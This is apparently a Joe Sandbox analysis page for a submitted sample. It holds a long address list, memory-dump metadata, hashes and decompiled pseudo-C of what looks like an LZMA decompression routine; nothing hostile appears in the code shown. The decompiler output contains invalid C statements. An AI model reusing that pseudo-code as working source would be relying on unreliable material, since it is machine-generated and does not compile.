0x00406fac
0x00406fac
0x00406fac
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x00000000
0x00406c8b
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x00000000
0x00406fd6
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00000000
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x00000000
0x00407267
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x00000000
0x004073da
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00000000
0x0040722f
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00406A4F Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406A4F(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004074A1))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8); // executed
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
